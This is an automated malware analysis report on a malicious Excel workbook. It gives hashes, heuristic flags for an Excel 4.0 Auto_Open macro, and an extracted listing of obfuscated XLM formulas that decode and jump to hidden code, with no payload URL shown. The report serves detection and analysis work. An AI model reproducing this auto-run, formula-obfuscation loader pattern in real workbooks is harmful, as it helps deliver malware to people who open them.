Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d56b1c755525824d…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:43:21 Authoring application: Microsoft Excel First seen: 2021-04-10
MD5: a3fc56835d5b25d676fd0e53e0bae404 SHA-1: cb70cba51c333363e75757503d31af2dabfcd703 SHA-256: d56b1c755525824df6d36adb06c9dcd24f5d9491557cd9b38d30761cd3babfa5
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6416 bytes
SHA-256: 03a87328b13f7705854b2162f33207eb28bdfb560cb9859ccd5d1b1cf2ae1106
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  mTYl
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!E141 
' 0018     20 LABEL : Cell Value, String Constant - dePeK len=0 
' 0018     26 LABEL : Cell Value, String Constant - DuwdWtzVtbM len=0 
' 0018     26 LABEL : Cell Value, String Constant - DyMTNCTmwcX len=0 
' 0018     24 LABEL : Cell Value, String Constant - FftpBdpkx len=0 
' 0018     24 LABEL : Cell Value, String Constant - FqAeBQUfr len=0 
' 0018     21 LABEL : Cell Value, String Constant - FWqJio len=0 
' 0018     25 LABEL : Cell Value, String Constant - fXTSJByQuw len=0 
' 0018     23 LABEL : Cell Value, String Constant - JEjyWdhQ len=0 
' 0018     25 LABEL : Cell Value, String Constant - JXRVMitBNK len=0 
' 0018     21 LABEL : Cell Value, String Constant - kAhxOV len=0 
' 0018     23 LABEL : Cell Value, String Constant - kIpZHnUB len=0 
' 0018     25 LABEL : Cell Value, String Constant - KsoVIxEwYe len=0 
' 0018     26 LABEL : Cell Value, String Constant - qIkXHdNgpIC len=0 
' 0018     27 LABEL : Cell Value, String Constant - qiwkTpHRBype len=0 
' 0018     20 LABEL : Cell Value, String Constant - tKEjK len=0 
' 0018     27 LABEL : Cell Value, String Constant - vxMJtTPiTIBS len=0 
' 0018     25 LABEL : Cell Value, String Constant - wUCytUPwkA len=0 
' 0018     23 LABEL : Cell Value, String Constant - xgwjjOgk len=0 
' 0018     26 LABEL : Cell Value, String Constant - YUAUbJzVxQP len=0 
' 0018     20 LABEL : Cell Value, String Constant - zcaTB len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  mTYl,E54,"SET.NAME("xgwjjOgk",VALUE("0"))",""
'  mTYl,E56,"SET.NAME("qiwkTpHRBype",xgwjjOgk)",""
'  mTYl,E58,"SET.NAME("JXRVMitBNK",xgwjjOgk)",""
'  mTYl,E60,"SET.NAME("DuwdWtzVtbM",COUNTA(tKEjK))",""
'  mTYl,E64,"SET.NAME("FqAeBQUfr",COUNTA(wUCytUPwkA))",""
'  mTYl,E66,[],""
'  mTYl,E70,"SET.NAME("kIpZHnUB","")",""
'  mTYl,E73,"qiwkTpHRBype",""
'  mTYl,E77,"SET.NAME("DyMTNCTmwcX",HLOOKUP("*",tKEjK,qiwkTpHRBype,FALSE))",""
'  mTYl,E81,"kAhxOV",""
'  mTYl,E85,"SET.NAME("qIkXHdNgpIC",xgwjjOgk)",""
'  mTYl,E87,[],""
'  mTYl,E89,"qIkXHdNgpIC",""
'  mTYl,E92,"fXTSJByQuw",""
'  mTYl,E97,"vxMJtTPiTIBS",""
'  mTYl,E101,"YUAUbJzVxQP",""
'  mTYl,E106,"SET.NAME("JEjyWdhQ",VALUE(HLOOKUP("*",wUCytUPwkA,YUAUbJzVxQP,FALSE)))",""
'  mTYl,E108,"KsoVIxEwYe",""
'  mTYl,E113,"kIpZHnUB",""
'  mTYl,E117,"JXRVMitBNK",""
'  mTYl,E121,NEXT(),""
'  mTYl,E126,"FftpBdpkx",""
'  mTYl,E129,"SET.NAME("f",INT(T(FORMULA(T(kIpZHnUB)&"",""&T(FftpBdpkx)))))",""
'  mTYl,E131,"dePeK",""
'  mTYl,E133,NEXT(),""
'  mTYl,E136,RETURN(),""
'  mTYl,E165,"SET.NAME("FWqJio",E54)",""
'  mTYl,E167,"tKEjK",""
'  mTYl,E172,"SET.NAME("wUCytUPwkA",R76C12)",""
'  mTYl,E176,"SET.NAME("dePeK",185)",""
'  mTYl,E179,"SET.NAME("zcaTB",5)",""
'  mTYl,E184,FWqJio(),""
'  mTYl,E185,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.